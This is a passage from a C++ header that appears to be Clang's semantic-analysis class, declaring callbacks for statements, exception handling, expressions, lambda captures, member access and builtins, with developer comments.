StmtResult ActOnMSAsmStmt(SourceLocation AsmLoc, SourceLocation LBraceLoc,
ArrayRef<Token> AsmToks,
StringRef AsmString,
unsigned NumOutputs, unsigned NumInputs,
ArrayRef<StringRef> Constraints,
ArrayRef<StringRef> Clobbers,
ArrayRef<Expr*> Exprs,
SourceLocation EndLoc);
LabelDecl *GetOrCreateMSAsmLabel(StringRef ExternalLabelName,
SourceLocation Location,
bool AlwaysCreate);
VarDecl *BuildObjCExceptionDecl(TypeSourceInfo *TInfo, QualType ExceptionType,
SourceLocation StartLoc,
SourceLocation IdLoc, IdentifierInfo *Id,
bool Invalid = false);
Decl *ActOnObjCExceptionDecl(Scope *S, Declarator &D);
StmtResult ActOnObjCAtCatchStmt(SourceLocation AtLoc, SourceLocation RParen,
Decl *Parm, Stmt *Body);
StmtResult ActOnObjCAtFinallyStmt(SourceLocation AtLoc, Stmt *Body);
StmtResult ActOnObjCAtTryStmt(SourceLocation AtLoc, Stmt *Try,
MultiStmtArg Catch, Stmt *Finally);
StmtResult BuildObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw);
StmtResult ActOnObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw,
Scope *CurScope);
ExprResult ActOnObjCAtSynchronizedOperand(SourceLocation atLoc,
Expr *operand);
StmtResult ActOnObjCAtSynchronizedStmt(SourceLocation AtLoc,
Expr *SynchExpr,
Stmt *SynchBody);
StmtResult ActOnObjCAutoreleasePoolStmt(SourceLocation AtLoc, Stmt *Body);
VarDecl *BuildExceptionDeclaration(Scope *S, TypeSourceInfo *TInfo,
SourceLocation StartLoc,
SourceLocation IdLoc,
IdentifierInfo *Id);
Decl *ActOnExceptionDeclarator(Scope *S, Declarator &D);
StmtResult ActOnCXXCatchBlock(SourceLocation CatchLoc,
Decl *ExDecl, Stmt *HandlerBlock);
StmtResult ActOnCXXTryBlock(SourceLocation TryLoc, Stmt *TryBlock,
ArrayRef<Stmt *> Handlers);
StmtResult ActOnSEHTryBlock(bool IsCXXTry, // try (true) or __try (false) ?
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
StmtResult ActOnSEHExceptBlock(SourceLocation Loc,
Expr *FilterExpr,
Stmt *Block);
void ActOnStartSEHFinallyBlock();
void ActOnAbortSEHFinallyBlock();
StmtResult ActOnFinishSEHFinallyBlock(SourceLocation Loc, Stmt *Block);
StmtResult ActOnSEHLeaveStmt(SourceLocation Loc, Scope *CurScope);
void DiagnoseReturnInConstructorExceptionHandler(CXXTryStmt *TryBlock);
bool ShouldWarnIfUnusedFileScopedDecl(const DeclaratorDecl *D) const;
/// If it's a file scoped decl that must warn if not used, keep track
/// of it.
void MarkUnusedFileScopedDecl(const DeclaratorDecl *D);
/// DiagnoseUnusedExprResult - If the statement passed in is an expression
/// whose result is unused, warn.
void DiagnoseUnusedExprResult(const Stmt *S);
void DiagnoseUnusedNestedTypedefs(const RecordDecl *D);
void DiagnoseUnusedDecl(const NamedDecl *ND);
/// Emit \p DiagID if statement located on \p StmtLoc has a suspicious null
/// statement as a \p Body, and it is located on the same line.
///
/// This helps prevent bugs due to typos, such as:
/// if (condition);
/// do_stuff();
void DiagnoseEmptyStmtBody(SourceLocation StmtLoc,
const Stmt *Body,
unsigned DiagID);
/// Warn if a for/while loop statement \p S, which is followed by
/// \p PossibleBody, has a suspicious null statement as a body.
void DiagnoseEmptyLoopBody(const Stmt *S,
const Stmt *PossibleBody);
/// Warn if a value is moved to itself.
void DiagnoseSelfMove(const Expr *LHSExpr, const Expr *RHSExpr,
SourceLocation OpLoc);
/// Warn if we're implicitly casting from a _Nullable pointer type to a
/// _Nonnull one.
void diagnoseNullableToNonnullConversion(QualType DstType, QualType SrcType,
SourceLocation Loc);
/// Warn when implicitly casting 0 to nullptr.
void diagnoseZeroToNullptrConversion(CastKind Kind, const Expr *E);
ParsingDeclState PushParsingDeclaration(sema::DelayedDiagnosticPool &pool) {
return DelayedDiagnostics.push(pool);
}
void PopParsingDeclaration(ParsingDeclState state, Decl *decl);
typedef ProcessingContextState ParsingClassState;
ParsingClassState PushParsingClass() {
ParsingClassDepth++;
return DelayedDiagnostics.pushUndelayed();
}
void PopParsingClass(ParsingClassState state) {
ParsingClassDepth--;
DelayedDiagnostics.popUndelayed(state);
}
void redelayDiagnostics(sema::DelayedDiagnosticPool &pool);
void DiagnoseAvailabilityOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass,
bool ObjCPropertyAccess,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
bool makeUnavailableInSystemHeader(SourceLocation loc,
UnavailableAttr::ImplicitReason reason);
/// Issue any -Wunguarded-availability warnings in \c FD
void DiagnoseUnguardedAvailabilityViolations(Decl *FD);
//===--------------------------------------------------------------------===//
// Expression Parsing Callbacks: SemaExpr.cpp.
bool CanUseDecl(NamedDecl *D, bool TreatUnavailableAsInvalid);
bool DiagnoseUseOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass = nullptr,
bool ObjCPropertyAccess = false,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReciever = nullptr);
void NoteDeletedFunction(FunctionDecl *FD);
void NoteDeletedInheritingConstructor(CXXConstructorDecl *CD);
bool DiagnosePropertyAccessorMismatch(ObjCPropertyDecl *PD,
ObjCMethodDecl *Getter,
SourceLocation Loc);
void DiagnoseSentinelCalls(NamedDecl *D, SourceLocation Loc,
ArrayRef<Expr *> Args);
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, Decl *LambdaContextDecl = nullptr,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
enum ReuseLambdaContextDecl_t { ReuseLambdaContextDecl };
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, ReuseLambdaContextDecl_t,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
void PopExpressionEvaluationContext();
void DiscardCleanupsInEvaluationContext();
ExprResult TransformToPotentiallyEvaluated(Expr *E);
ExprResult HandleExprEvaluationContextForTypeof(Expr *E);
ExprResult CheckUnevaluatedOperand(Expr *E);
void CheckUnusedVolatileAssignment(Expr *E);
ExprResult ActOnConstantExpression(ExprResult Res);
// Functions for marking a declaration referenced. These functions also
// contain the relevant logic for marking if a reference to a function or
// variable is an odr-use (in the C++11 sense). There are separate variants
// for expressions referring to a decl; these exist because odr-use marking
// needs to be delayed for some constant variables when we build one of the
// named expressions.
//
// MightBeOdrUse indicates whether the use could possibly be an odr-use, and
// should usually be true. This only needs to be set to false if the lack of
// odr-use cannot be determined from the current context (for instance,
// because the name denotes a virtual function and was written without an
// explicit nested-name-specifier).
void MarkAnyDeclReferenced(SourceLocation Loc, Decl *D, bool MightBeOdrUse);
void MarkFunctionReferenced(SourceLocation Loc, FunctionDecl *Func,
bool MightBeOdrUse = true);
void MarkVariableReferenced(SourceLocation Loc, VarDecl *Var);
void MarkDeclRefReferenced(DeclRefExpr *E, const Expr *Base = nullptr);
void MarkMemberReferenced(MemberExpr *E);
void MarkFunctionParmPackReferenced(FunctionParmPackExpr *E);
void MarkCaptureUsedInEnclosingContext(VarDecl *Capture, SourceLocation Loc,
unsigned CapturingScopeIndex);
ExprResult CheckLValueToRValueConversionOperand(Expr *E);
void CleanupVarDeclMarking();
enum TryCaptureKind {
TryCapture_Implicit, TryCapture_ExplicitByVal, TryCapture_ExplicitByRef
};
/// Try to capture the given variable.
///
/// \param Var The variable to capture.
///
/// \param Loc The location at which the capture occurs.
///
/// \param Kind The kind of capture, which may be implicit (for either a
/// block or a lambda), or explicit by-value or by-reference (for a lambda).
///
/// \param EllipsisLoc The location of the ellipsis, if one is provided in
/// an explicit lambda capture.
///
/// \param BuildAndDiagnose Whether we are actually supposed to add the
/// captures or diagnose errors. If false, this routine merely check whether
/// the capture can occur without performing the capture itself or complaining
/// if the variable cannot be captured.
///
/// \param CaptureType Will be set to the type of the field used to capture
/// this variable in the innermost block or lambda. Only valid when the
/// variable can be captured.
///
/// \param DeclRefType Will be set to the type of a reference to the capture
/// from within the current scope. Only valid when the variable can be
/// captured.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// variables that may or may not be used in certain specializations of
/// a nested generic lambda.
///
/// \returns true if an error occurred (i.e., the variable cannot be
/// captured) and false if the capture succeeded.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc, TryCaptureKind Kind,
SourceLocation EllipsisLoc, bool BuildAndDiagnose,
QualType &CaptureType,
QualType &DeclRefType,
const unsigned *const FunctionScopeIndexToStopAt);
/// Try to capture the given variable.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc,
TryCaptureKind Kind = TryCapture_Implicit,
SourceLocation EllipsisLoc = SourceLocation());
/// Checks if the variable must be captured.
bool NeedToCaptureVariable(VarDecl *Var, SourceLocation Loc);
/// Given a variable, determine the type that a reference to that
/// variable will have in the given scope.
QualType getCapturedDeclRefType(VarDecl *Var, SourceLocation Loc);
/// Mark all of the declarations referenced within a particular AST node as
/// referenced. Used when template instantiation instantiates a non-dependent
/// type -- entities referenced by the type are now referenced.
void MarkDeclarationsReferencedInType(SourceLocation Loc, QualType T);
void MarkDeclarationsReferencedInExpr(Expr *E,
bool SkipLocalVariables = false);
/// Try to recover by turning the given expression into a
/// call. Returns true if recovery was attempted or an error was
/// emitted; this may also leave the ExprResult invalid.
bool tryToRecoverWithCall(ExprResult &E, const PartialDiagnostic &PD,
bool ForceComplain = false,
bool (*IsPlausibleResult)(QualType) = nullptr);
/// Figure out if an expression could be turned into a call.
bool tryExprAsCall(Expr &E, QualType &ZeroArgCallReturnTy,
UnresolvedSetImpl &NonTemplateOverloads);
/// Conditionally issue a diagnostic based on the current
/// evaluation context.
///
/// \param Statement If Statement is non-null, delay reporting the
/// diagnostic until the function body is parsed, and then do a basic
/// reachability analysis to determine if the statement is reachable.
/// If it is unreachable, the diagnostic will not be emitted.
bool DiagRuntimeBehavior(SourceLocation Loc, const Stmt *Statement,
const PartialDiagnostic &PD);
/// Similar, but diagnostic is only produced if all the specified statements
/// are reachable.
bool DiagRuntimeBehavior(SourceLocation Loc, ArrayRef<const Stmt*> Stmts,
const PartialDiagnostic &PD);
// Primary Expressions.
SourceRange getExprRange(Expr *E) const;
ExprResult ActOnIdExpression(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
UnqualifiedId &Id, bool HasTrailingLParen, bool IsAddressOfOperand,
CorrectionCandidateCallback *CCC = nullptr,
bool IsInlineAsmIdentifier = false, Token *KeywordReplacement = nullptr);
void DecomposeUnqualifiedId(const UnqualifiedId &Id,
TemplateArgumentListInfo &Buffer,
DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *&TemplateArgs);
bool
DiagnoseEmptyLookup(Scope *S, CXXScopeSpec &SS, LookupResult &R,
CorrectionCandidateCallback &CCC,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
ArrayRef<Expr *> Args = None, TypoExpr **Out = nullptr);
DeclResult LookupIvarInObjCMethod(LookupResult &Lookup, Scope *S,
IdentifierInfo *II);
ExprResult BuildIvarRefExpr(Scope *S, SourceLocation Loc, ObjCIvarDecl *IV);
ExprResult LookupInObjCMethod(LookupResult &LookUp, Scope *S,
IdentifierInfo *II,
bool AllowBuiltinCreation=false);
ExprResult ActOnDependentIdExpression(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
bool isAddressOfOperand,
const TemplateArgumentListInfo *TemplateArgs);
/// If \p D cannot be odr-used in the current expression evaluation context,
/// return a reason explaining why. Otherwise, return NOUR_None.
NonOdrUseReason getNonOdrUseReasonInCurrentContext(ValueDecl *D);
DeclRefExpr *BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
SourceLocation Loc,
const CXXScopeSpec *SS = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
const CXXScopeSpec *SS = nullptr,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
NestedNameSpecifierLoc NNS,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
ExprResult
BuildAnonymousStructUnionMemberReference(
const CXXScopeSpec &SS,
SourceLocation nameLoc,
IndirectFieldDecl *indirectField,
DeclAccessPair FoundDecl = DeclAccessPair::make(nullptr, AS_none),
Expr *baseObjectExpr = nullptr,
SourceLocation opLoc = SourceLocation());
ExprResult BuildPossibleImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S);
ExprResult BuildImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
bool IsDefiniteInstance,
const Scope *S);
bool UseArgumentDependentLookup(const CXXScopeSpec &SS,
const LookupResult &R,
bool HasTrailingLParen);
ExprResult
BuildQualifiedDeclarationNameExpr(CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
bool IsAddressOfOperand, const Scope *S,
TypeSourceInfo **RecoveryTSI = nullptr);
ExprResult BuildDependentDeclRefExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildDeclarationNameExpr(const CXXScopeSpec &SS,
LookupResult &R,
bool NeedsADL,
bool AcceptInvalidDecl = false);
ExprResult BuildDeclarationNameExpr(
const CXXScopeSpec &SS, const DeclarationNameInfo &NameInfo, NamedDecl *D,
NamedDecl *FoundD = nullptr,
const TemplateArgumentListInfo *TemplateArgs = nullptr,
bool AcceptInvalidDecl = false);
ExprResult BuildLiteralOperatorCall(LookupResult &R,
DeclarationNameInfo &SuffixInfo,
ArrayRef<Expr *> Args,
SourceLocation LitEndLoc,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
ExprResult BuildPredefinedExpr(SourceLocation Loc,
PredefinedExpr::IdentKind IK);
ExprResult ActOnPredefinedExpr(SourceLocation Loc, tok::TokenKind Kind);
ExprResult ActOnIntegerConstant(SourceLocation Loc, uint64_t Val);
bool CheckLoopHintExpr(Expr *E, SourceLocation Loc);
ExprResult ActOnNumericConstant(const Token &Tok, Scope *UDLScope = nullptr);
ExprResult ActOnCharacterConstant(const Token &Tok,
Scope *UDLScope = nullptr);
ExprResult ActOnParenExpr(SourceLocation L, SourceLocation R, Expr *E);
ExprResult ActOnParenListExpr(SourceLocation L,
SourceLocation R,
MultiExprArg Val);
/// ActOnStringLiteral - The specified tokens were lexed as pasted string
/// fragments (e.g. "foo" "bar" L"baz").
ExprResult ActOnStringLiteral(ArrayRef<Token> StringToks,
Scope *UDLScope = nullptr);
ExprResult ActOnGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<ParsedType> ArgTypes,
ArrayRef<Expr *> ArgExprs);
ExprResult CreateGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<TypeSourceInfo *> Types,
ArrayRef<Expr *> Exprs);
// Binary/Unary Operators. 'Tok' is the token for the operator.
ExprResult CreateBuiltinUnaryOp(SourceLocation OpLoc, UnaryOperatorKind Opc,
Expr *InputExpr);
ExprResult BuildUnaryOp(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opc, Expr *Input);
ExprResult ActOnUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Op, Expr *Input);
bool isQualifiedMemberAccess(Expr *E);
QualType CheckAddressOfOperand(ExprResult &Operand, SourceLocation OpLoc);
ExprResult CreateUnaryExprOrTypeTraitExpr(TypeSourceInfo *TInfo,
SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
SourceRange R);
ExprResult CreateUnaryExprOrTypeTraitExpr(Expr *E, SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind);
ExprResult
ActOnUnaryExprOrTypeTraitExpr(SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
bool IsType, void *TyOrEx,
SourceRange ArgRange);
ExprResult CheckPlaceholderExpr(Expr *E);
bool CheckVecStepExpr(Expr *E);
bool CheckUnaryExprOrTypeTraitOperand(Expr *E, UnaryExprOrTypeTrait ExprKind);
bool CheckUnaryExprOrTypeTraitOperand(QualType ExprType, SourceLocation OpLoc,
SourceRange ExprRange,
UnaryExprOrTypeTrait ExprKind);
ExprResult ActOnSizeofParameterPackExpr(Scope *S,
SourceLocation OpLoc,
IdentifierInfo &Name,
SourceLocation NameLoc,
SourceLocation RParenLoc);
ExprResult ActOnPostfixUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Kind, Expr *Input);
ExprResult ActOnArraySubscriptExpr(Scope *S, Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult CreateBuiltinArraySubscriptExpr(Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult ActOnOMPArraySectionExpr(Expr *Base, SourceLocation LBLoc,
Expr *LowerBound, SourceLocation ColonLoc,
Expr *Length, SourceLocation RBLoc);
// This struct is for use by ActOnMemberAccess to allow
// BuildMemberReferenceExpr to be able to reinvoke ActOnMemberAccess after
// changing the access operator from a '.' to a '->' (to see if that is the
// change needed to fix an error about an unknown member, e.g. when the class
// defines a custom operator->).
struct ActOnMemberAccessExtraArgs {
Scope *S;
UnqualifiedId &Id;
Decl *ObjCImpDecl;
};
ExprResult BuildMemberReferenceExpr(
Expr *Base, QualType BaseType, SourceLocation OpLoc, bool IsArrow,
CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult
BuildMemberReferenceExpr(Expr *Base, QualType BaseType, SourceLocation OpLoc,
bool IsArrow, const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
bool SuppressQualifierCheck = false,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult BuildFieldReferenceExpr(Expr *BaseExpr, bool IsArrow,
SourceLocation OpLoc,
const CXXScopeSpec &SS, FieldDecl *Field,
DeclAccessPair FoundDecl,
const DeclarationNameInfo &MemberNameInfo);
ExprResult PerformMemberExprBaseConversion(Expr *Base, bool IsArrow);
bool CheckQualifiedMemberReference(Expr *BaseExpr, QualType BaseType,
const CXXScopeSpec &SS,
const LookupResult &R);
ExprResult ActOnDependentMemberExpr(Expr *Base, QualType BaseType,
bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult ActOnMemberAccessExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Member,
Decl *ObjCImpDecl);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec *SS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
NestedNameSpecifierLoc NNS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
void ActOnDefaultCtorInitializers(Decl *CDtorDecl);
bool ConvertArgumentsForCall(CallExpr *Call, Expr *Fn,
FunctionDecl *FDecl,
const FunctionProtoType *Proto,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
bool ExecConfig = false);
void CheckStaticArrayArgument(SourceLocation CallLoc,
ParmVarDecl *Param,
const Expr *ArgExpr);
/// ActOnCallExpr - Handle a call to Fn with the specified array of arguments.
/// This provides the location of the left/right parens and a list of comma
/// locations.
ExprResult ActOnCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr);
ExprResult BuildCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr,
bool IsExecConfig = false);
enum class AtomicArgumentOrder { API, AST };
ExprResult
BuildAtomicExpr(SourceRange CallRange, SourceRange ExprRange,
SourceLocation RParenLoc, MultiExprArg Args,
AtomicExpr::AtomicOp Op,
AtomicArgumentOrder ArgOrder = AtomicArgumentOrder::API);
ExprResult
BuildResolvedCallExpr(Expr *Fn, NamedDecl *NDecl, SourceLocation LParenLoc,
ArrayRef<Expr *> Arg, SourceLocation RParenLoc,
Expr *Config = nullptr, bool IsExecConfig = false,
ADLCallKind UsesADL = ADLCallKind::NotADL);
ExprResult ActOnCUDAExecConfigExpr(Scope *S, SourceLocation LLLLoc,
MultiExprArg ExecConfig,
SourceLocation GGGLoc);
ExprResult ActOnCastExpr(Scope *S, SourceLocation LParenLoc,
Declarator &D, ParsedType &Ty,
SourceLocation RParenLoc, Expr *CastExpr);
ExprResult BuildCStyleCastExpr(SourceLocation LParenLoc,
TypeSourceInfo *Ty,
SourceLocation RParenLoc,
Expr *Op);
CastKind PrepareScalarCast(ExprResult &src, QualType destType);
/// Build an altivec or OpenCL literal.
ExprResult BuildVectorLiteral(SourceLocation LParenLoc,
SourceLocation RParenLoc, Expr *E,
TypeSourceInfo *TInfo);
ExprResult MaybeConvertParenListExprToParenExpr(Scope *S, Expr *ME);
ExprResult ActOnCompoundLiteral(SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc,
Expr *InitExpr);
ExprResult BuildCompoundLiteralExpr(SourceLocation LParenLoc,
TypeSourceInfo *TInfo,
SourceLocation RParenLoc,
Expr *LiteralExpr);
ExprResult ActOnInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult BuildInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult ActOnDesignatedInitializer(Designation &Desig,
SourceLocation EqualOrColonLoc,
bool GNUSyntax,
ExprResult Init);
private:
static BinaryOperatorKind ConvertTokenKindToBinaryOpcode(tok::TokenKind Kind);
public:
ExprResult ActOnBinOp(Scope *S, SourceLocation TokLoc,
tok::TokenKind Kind, Expr *LHSExpr, Expr *RHSExpr);
ExprResult BuildBinOp(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opc, Expr *LHSExpr, Expr *RHSExpr);
ExprResult CreateBuiltinBinOp(SourceLocation OpLoc, BinaryOperatorKind Opc,
Expr *LHSExpr, Expr *RHSExpr);
void DiagnoseCommaOperator(const Expr *LHS, SourceLocation Loc);
/// ActOnConditionalOp - Parse a ?: operation. Note that 'LHS' may be null
/// in the case of a the GNU conditional expr extension.
ExprResult ActOnConditionalOp(SourceLocation QuestionLoc,
SourceLocation ColonLoc,
Expr *CondExpr, Expr *LHSExpr, Expr *RHSExpr);
/// ActOnAddrLabel - Parse the GNU address of label extension: "&&foo".
ExprResult ActOnAddrLabel(SourceLocation OpLoc, SourceLocation LabLoc,
LabelDecl *TheDecl);
void ActOnStartStmtExpr();
ExprResult ActOnStmtExpr(SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc); // "({..})"
// Handle the final expression in a statement expression.
ExprResult ActOnStmtExprResult(ExprResult E);
void ActOnStmtExprError();
// __builtin_offsetof(type, identifier(.identifier|[expr])*)
struct OffsetOfComponent {
SourceLocation LocStart, LocEnd;
bool isBrackets; // true if [expr], false if .ident
union {
IdentifierInfo *IdentInfo;
Expr *E;
} U;
};
/// __builtin_offsetof(type, a.b[123][456].c)
ExprResult BuildBuiltinOffsetOf(SourceLocation BuiltinLoc,
TypeSourceInfo *TInfo,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
ExprResult ActOnBuiltinOffsetOf(Scope *S,
SourceLocation BuiltinLoc,
SourceLocation TypeLoc,
ParsedType ParsedArgTy,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
// __builtin_choose_expr(constExpr, expr1, expr2)
ExprResult ActOnChooseExpr(SourceLocation BuiltinLoc,
Expr *CondExpr, Expr *LHSExpr,
Expr *RHSExpr, SourceLocation RPLoc);
// __builtin_va_arg(expr, type)
ExprResult ActOnVAArg(SourceLocation BuiltinLoc, Expr *E, ParsedType Ty,
SourceLocation RPLoc);
ExprResult BuildVAArgExpr(SourceLocation BuiltinLoc, Expr *E,
TypeSourceInfo *TInfo, SourceLocation RPLoc);
// __builtin_LINE(), __builtin_FUNCTION(), __builtin_FILE(),
// __builtin_COLUMN()
ExprResult ActOnSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc,
SourceLocation RPLoc);
// Build a potentially resolved SourceLocExpr.
ExprResult BuildSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc, SourceLocation RPLoc,
DeclContext *ParentContext);
// __null
ExprResult ActOnGNUNullExpr(SourceLocation TokenLoc);
bool CheckCaseExpression(Expr *E);
/// Describes the result of an "if-exists" condition check.
enum IfExistsResult {
/// The symbol exists.
IER_Exists,
/// The symbol does not exist.
IER_DoesNotExist,
/// The name is a dependent name, so the results will differ
/// from one instantiation to the next.
IER_Dependent,
/// An error occurred.
IER_Error
};
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, CXXScopeSpec &SS,
const DeclarationNameInfo &TargetNameInfo);
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, SourceLocation KeywordLoc,
bool IsIfExists, CXXScopeSpec &SS,
UnqualifiedId &Name);
StmtResult BuildMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
NestedNameSpecifierLoc QualifierLoc,
DeclarationNameInfo NameInfo,
Stmt *Nested);
StmtResult ActOnMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
CXXScopeSpec &SS, UnqualifiedId &Name,
Stmt *Nested);
//===------------------------- "Block" Extension ------------------------===//
/// ActOnBlockStart - This callback is invoked when a block literal is
/// started.
void ActOnBlockStart(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockArguments - This callback allows processing of block arguments.
/// If there are no arguments, this is still invoked.
void ActOnBlockArguments(SourceLocation CaretLoc, Declarator &ParamInfo,
Scope *CurScope);
/// ActOnBlockError - If there is an error parsing a block, this callback
/// is invoked to pop the information about the block from the action impl.
void ActOnBlockError(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockStmtExpr - This is called when the body of a block statement
/// literal was successfully completed. ^(int x){...}
ExprResult ActOnBlockStmtExpr(SourceLocation CaretLoc, Stmt *Body,
Scope *CurScope);
//===---------------------------- Clang Extensions ----------------------===//
/// __builtin_convertvector(...)
ExprResult ActOnConvertVectorExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- OpenCL Features -----------------------===//
/// __builtin_astype(...)
ExprResult ActOnAsTypeExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- C++ Features --------------------------===//
// Act on C++ namespaces
Decl *ActOnStartNamespaceDef(Scope *S, SourceLocation InlineLoc,
SourceLocation NamespaceLoc,
SourceLocation IdentLoc, IdentifierInfo *Ident,
SourceLocation LBrace,
const ParsedAttributesView &AttrList,
UsingDirectiveDecl *&UsingDecl);
void ActOnFinishNamespaceDef(Decl *Dcl, SourceLocation RBrace);
NamespaceDecl *getStdNamespace() const;
NamespaceDecl *getOrCreateStdNamespace();
NamespaceDecl *lookupStdExperimentalNamespace();
CXXRecordDecl *getStdBadAlloc() const;
EnumDecl *getStdAlignValT() const;
private:
// A cache representing if we've fully checked the various comparison category
// types stored in ASTContext. The bit-index corresponds to the integer value
// of a ComparisonCategoryType enumerator.
llvm::SmallBitVector FullyCheckedComparisonCategories;
ValueDecl *tryLookupCtorInitMemberDecl(CXXRecordDecl *ClassDecl,
CXXScopeSpec &SS,
ParsedType TemplateTypeTy,
IdentifierInfo *MemberOrBase);
public:
enum class ComparisonCategoryUsage {
/// The '<=>' operator was used in an expression and a builtin operator
/// was selected.
OperatorInExpression,
/// A defaulted 'operator<=>' needed the comparison category. This
/// typically only applies to 'std::strong_ordering', due to the implicit
/// fallback return value.
DefaultedOperator,
};
/// Lookup the specified comparison category types in the standard
